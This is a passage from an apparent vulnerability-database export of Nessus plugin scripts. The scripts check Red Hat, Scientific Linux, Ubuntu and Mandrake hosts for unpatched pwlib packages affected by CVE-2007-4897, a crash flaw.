(\"1.22\");\n script_cvs_date(\"Date: 2019/10/25 13:36:12\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"RHEL 5 : pwlib (RHSA-2007:0932)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0932\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib and / or pwlib-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0932\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pwlib / pwlib-devel\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T03:29:42", "bulletinFamily": "scanner", "description": "In Scientific Linux 5, the Ekiga teleconferencing application uses\nPWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).", "modified": "2019-11-02T00:00:00", "id": "SL_20071008_PWLIB_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60265", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : pwlib on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60265);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/25 13:36:17\");\n\n script_cve_id(\"CVE-2007-4897\");\n\n script_name(english:\"Scientific Linux Security Update : pwlib on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Scientific Linux 5, the Ekiga teleconferencing application uses\nPWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0710&L=scientific-linux-errata&T=0&P=428\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa0410a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib and / or pwlib-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:38:14", "bulletinFamily": "scanner", "description": "Jose Miguel Esparza discovered that pwlib did not correctly handle\nlarge string lengths. A remote attacker could send specially crafted\npackets to applications linked against pwlib (e.g. Ekiga) causing them\nto crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-561-1.NASL", "href": "https://www.tenable.com/plugins/nessus/29917", "published": "2008-01-10T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : pwlib vulnerability (USN-561-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-561-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29917);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"USN\", value:\"561-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : pwlib vulnerability (USN-561-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jose Miguel Esparza discovered that pwlib did not correctly handle\nlarge string lengths. A remote attacker could send specially crafted\npackets to applications linked against pwlib (e.g. Ekiga) causing them\nto crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/561-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-1.10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-avc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-v4l\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpt-plugins-v4l2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04|7\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04 / 7.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-1.10.0\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-dbg\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-dev\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-doc\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-alsa\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-avc\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-dc\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-oss\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-v4l\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpt-plugins-v4l2\", pkgver:\"1.10.0-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-1.10.0\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-dbg\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-dev\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-doc\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-alsa\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-avc\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-dc\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-oss\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-v4l\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libpt-plugins-v4l2\", pkgver:\"1.10.2.dfsg-0ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-1.10.0\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-dbg\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-dev\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-doc\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-alsa\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-avc\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-dc\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-oss\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-v4l\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libpt-plugins-v4l2\", pkgver:\"1.10.3-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-1.10.0\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-dbg\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-dev\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-doc\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-alsa\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-avc\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-dc\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-oss\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-v4l\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpt-plugins-v4l2\", pkgver:\"1.10.10-0ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpt-1.10.0 / libpt-dbg / libpt-dev / libpt-doc / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:55:01", "bulletinFamily": "scanner", "description": "A memory management flaw was discovered in PWLib, that an attacker\ncould use to crash an application linked with it, such as Ekiga.\n\nUpdated packages have been patched to prevent these issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRAKE_MDKSA-2007-206.NASL", "href": "https://www.tenable.com/plugins/nessus/27624", "published": "2007-11-05T00:00:00", "title": "Mandrake Linux Security Advisory : pwlib (MDKSA-2007:206)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:206. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27624);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:49\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"MDKSA\", value:\"2007:206\");\n\n script_name(english:\"Mandrake Linux Security Advisory : pwlib (MDKSA-2007:206)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory management flaw was discovered in PWLib, that an attacker\ncould use to crash an application linked with it, such as Ekiga.\n\nUpdated packages have been patched to prevent these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pwlib1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pwlib1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pwlib1-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pwlib1-plugins-avc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pwlib1-plugins-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpwlib1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpwlib1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpwlib1-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpwlib1-plugins-avc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpwlib1-plugins-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-devel-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-avc-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-dc-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libpwlib1-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libpwlib1-devel-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-avc-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-dc-1.10.2-2.1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64pwlib1-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64pwlib1-devel-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-avc-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-dc-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpwlib1-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpwlib1-devel-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpwlib1-plugins-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpwlib1-plugins-avc-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpwlib1-plugins-dc-1.10.5-1.1mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-devel-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-avc-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64pwlib1-plugins-dc-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpwlib1-1.10.10-2.1mdv2008.0\", 